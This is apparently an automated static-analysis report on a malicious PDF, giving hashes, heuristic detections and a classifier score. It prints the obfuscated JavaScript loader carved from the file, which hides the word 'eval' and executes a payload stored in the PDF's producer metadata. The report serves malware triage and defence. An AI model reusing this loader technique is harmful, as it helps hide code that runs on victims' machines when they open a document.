Malicious PDF — malware analysis report

Static analysis result for SHA-256 d364ea87dcd2bb3c…

MALICIOUS

PDF

22.1 KB Created: 2010-07-25 10:32:51 First seen: 2026-05-08
MD5: 5bbb6feaf9eb1fb49cb5f981f9099f92 SHA-1: 7c426c39da95b801d0b52342bfb5468467c7b40f SHA-256: d364ea87dcd2bb3c3eec308effa17d4072812fd0c2dae778a4823d6f21ee9943
116 Risk Score

Malware Insights

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript actions and streams. The extracted JavaScript file, 'javascript_obj0001_000.js', likely attempts to execute malicious code upon opening the PDF. The exact intent of the script is unclear due to potential obfuscation, but its presence is a strong indicator of malicious activity.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    dbxa\(dbxa\('String.fromCharCode\(' + uurb + '\)'\)\);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x5619 366 bytes
SHA-256: 75765252c5126db746b4fd2d63a768b66268610864d1a5f1482793e8a0c3daa4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
ognfx = app;
gxj = new Date(2010,11,4);
var iep='';
var advhl = 'e'+gxj.getDay()+'a'+iep+'l';
advhl = advhl.replace('6','v');
dbxa=ognfx[advhl];
var iep='';
dbxa('va'+iep+'r ktrs=th'+iep+'i'+iep+'s');
zzp='pr' + iep + gxj.getDay() + iep + 'uc' +'er';
zzp = zzp.replace('6', 'od');
var uurb = ktrs[zzp];
dbxa(dbxa('String.fromCharCode(' + uurb + ')'));

Open this report in the interactive analyzer, or submit your own file for analysis.